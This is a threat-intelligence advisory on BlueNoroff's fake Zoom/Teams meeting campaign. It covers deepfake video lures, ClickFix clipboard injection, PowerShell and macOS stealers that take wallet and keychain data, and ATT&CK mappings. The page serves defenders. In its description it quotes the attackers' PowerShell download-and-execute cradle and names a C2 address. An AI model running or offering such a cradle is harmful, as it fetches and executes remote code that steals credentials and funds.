# BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit: AI Deepfake Video Lures, ClickFix PowerShell Loaders, and Crypto Wallet/iCloud Keychain Theft

> North Korean-aligned BlueNoroff (Lazarus Group financial sub-cluster) is running active ClickFix-style phishing campaigns using typosquatted Zoom/Teams meeting domains and AI-generated deepfake video to lure cryptocurrency and venture-capital professionals into running PowerShell/VBScript loaders (Windows) or shell-script stealers (macOS). Five distinct phishing-kit versions were identified between 31 May and 14 July 2026, disabling Defender, enumerating 25+ crypto wallet browser extensions, extracting Chrome master keys and iCloud Keychain data, and exfiltrating via Telegram bot API and dedicated C2 servers.

- **Published:** 2026-07-24T00:00:00Z
- **Last reviewed:** 2026-07-24T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-1678
- **ID:** TL-2026-1678
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** APT38 (North Korea)
- **Detections:** 9 · **IOCs:** 35 (full data via the Threadlinqs MCP server — Purple tier)

## Description

BlueNoroff, the financially motivated cybercrime sub-cluster of North Korea's Lazarus Group, is operating an active phishing-kit campaign publicly tracked (in overlapping reporting from Sekoia, Arctic Wolf, and Huntress) as "ClickFake Interview"/fake-meeting operations. The operation begins with social engineering over Telegram or LinkedIn/X using a hijacked or fabricated contact, a manipulated Calendly invite, and a typosquatted Zoom or Microsoft Teams domain (over 80 such domains identified, registered in bulk with a single hosting provider). Victims are drawn into a self-contained JavaScript fake meeting room that captures webcam video via getUserMedia and streams it to attacker infrastructure, seeding a self-reinforcing AI deepfake production pipeline (ChatGPT/GPT-4o generated portraits composited with real captured body movement using Adobe Premiere Pro, FFmpeg, and Microsoft Clipchamp) used to spoof legitimacy in subsequent calls.

Approximately eight seconds into the fake call, a ClickFix-style overlay prompts the victim to "fix" a fabricated audio/SDK error by copying and pasting a command; the attacker intercepts the clipboard and injects a PowerShell download-cradle (`powershell -ep bypass -c "(iwr ... -UseBasicParsing).Content | iex"`). This downloads a Base64/XOR (key 0x43) obfuscated second-stage PowerShell downloader that lands a further payload in `%TEMP%\chromechip.log`, disables/exclusions Microsoft Defender, and displays a fake "Zoom was updated successfully" dialog to dispel suspicion. A final in-memory PowerShell implant beacons every five seconds to a dedicated C2 (observed: `83.136.208.246:6783/api/daemon`), exfiltrating host reconnaissance data (hostname, username, OS build, timezone, running processes, admin/proxy status).

Post-exploitation modules include: Telegram Desktop session theft (`tdata`/`key_datas`) enabling account-hijack-driven onward campaigns; a Donut-loaded, MSVC-compiled native PE64 browser-credential stealer that recovers Chrome/Edge/Brave app-bound encryption keys via COM elevation (`IElevator`) and AES-256-GCM/BCrypt decryption, writing credentials to `pchr.csv`/`pmse.csv`/`pbra.csv`; screenshot capture via both direct HTTP POST and Telegram Bot API; UAC-bypass privilege escalation via the `Elevation:Administrator!new` COM moniker; and Startup-folder LNK persistence disguised as a Chrome updater (observed to persist up to 66 days).

On macOS, a fake Teams/Zoom `.pkg`/AppleScript installer (`zoom_sdk_support.scpt`) drops a modular toolset written in Go, Nim, Objective-C, Swift, and C/C++: a Go backdoor ("Root Troy V4"/`remoted`), a Go infostealer ("CryptoBot"/`airmond`), an Objective-C keylogger ("XScreen"/`keyboardd`) using Core Graphics EventTap, and a Nim-based persistent implant masquerading as "Telegram 2", installed as a LaunchDaemon (`/Library/LaunchDaemons/com.telegram2.update.agent.plist`) running hourly. The macOS toolset enumerates and exfiltrates data for 25+ cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, TON, Sui, and others), extracts Chrome master keys sourced from iCloud Keychain, and captures keystrokes, screenshots, clipboard content, and audio, exfiltrating over HTTPS and WebSocket C2 channels and a dedicated Telegram channel ("Aurora").

Victimology skews heavily toward cryptocurrency/Web3 and adjacent finance/investment roles: of 100 identified targets in the Arctic Wolf dataset, 80% work in Web3/crypto, 76% hold C-level or founder titles, and targeting is concentrated during DPRK business hours (08:00-18:00 KST, Monday-Friday). The campaign is under continuous, rapid development — five distinct phishing-kit versions were fielded between 31 May and 14 July 2026 — consistent with a well-resourced, state-directed operation rather than opportunistic cybercrime.

## MITRE ATT&CK

- T1598 Phishing for Information
- T1566 Phishing
- T1204 User Execution
- T1059 Command and Scripting Interpreter
- T1106 Native API
- T1547 Boot or Logon Autostart Execution
- T1037 Boot or Logon Initialization Scripts
- T1134 Access Token Manipulation
- T1548 Abuse Elevation Control Mechanism
- T1036 Masquerading
- T1140 Deobfuscate/Decode Files or Information
- T1027 Obfuscated Files or Information
- T1553 Subvert Trust Controls
- T1685 Disable or Modify Tools
- T1555 Credentials from Password Stores
- T1552 Unsecured Credentials
- T1557 Adversary-in-the-Middle
- T1087 Account Discovery
- T1518 Software Discovery
- T1082 System Information Discovery
- T1033 System Owner/User Discovery
- T1049 System Network Connections Discovery
- T1083 File and Directory Discovery
- T1120 Peripheral Device Discovery
- T1007 System Service Discovery
- T1482 Domain Trust Discovery
- T1005 Data from Local System
- T1056 Input Capture
- T1123 Audio Capture
- T1113 Screen Capture
- T1115 Clipboard Data
- T1041 Exfiltration Over C2 Channel
- T1119 Automated Collection

## Sources

- [BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets](https://thehackernews.com/2026/07/bluenoroff-zoom-phishing-kit-profiles.html)
- [BlueNoroff Uses ClickFix, Fileless PowerShell, and AI-Generated Fake Zoom Meetings to Target Web3 Sector](https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/)
- [Inside the BlueNoroff Web3 macOS Intrusion Analysis](https://www.huntress.com/blog/inside-bluenoroff-web3-intrusion-analysis)
- [Lazarus ClickFake Interview Campaign: ClickFix Malware](https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/)
- [From Contagious to ClickFake Interview (TLP:CLEAR Investigation Report)](https://blog.sekoia.io/wp-content/uploads/2025/05/From-contagious-to-clickfake-interview-sekoia.io-march-2025-tlp-clear.pdf)
- [BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with macOS Backdoor Malware](https://thehackernews.com/2025/06/bluenoroff-deepfake-zoom-scam-hits.html)
- [BlueNoroff Uses Fake Zoom Calls to Turn Victims Into Attack Lures](https://www.darkreading.com/cyberattacks-data-breaches/bluenoroff-turns-victims-into-new-attack-lures)
- [North Korean Hackers Target Crypto Firms with ClickFix and Zoom Lures](https://www.infosecurity-magazine.com/news/bluenoroff-dprk-hackers-target/)
- [North Korea's BlueNoroff uses deepfakes in Zoom calls to hack crypto workers](https://dig.watch/updates/north-koreas-bluenoroff-uses-deepfakes-in-zoom-calls-to-hack-crypto-workers)
- [BlueNoroff hackers steal crypto using fake MetaMask extension](https://www.bleepingcomputer.com/news/security/bluenoroff-hackers-steal-crypto-using-fake-metamask-extension/)
- [BlueNoroff Group: The Financial Cybercrime Arm of Lazarus](https://www.picussecurity.com/resource/blog/bluenoroff-group-the-financial-cybercrime-arm-of-lazarus)
- [DPRK's Famous Chollima Deploys RATs Through ClickFake Job Interviews](https://socradar.io/blog/dprk-clickfake-pylangghost-golangghost-rats/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-1678
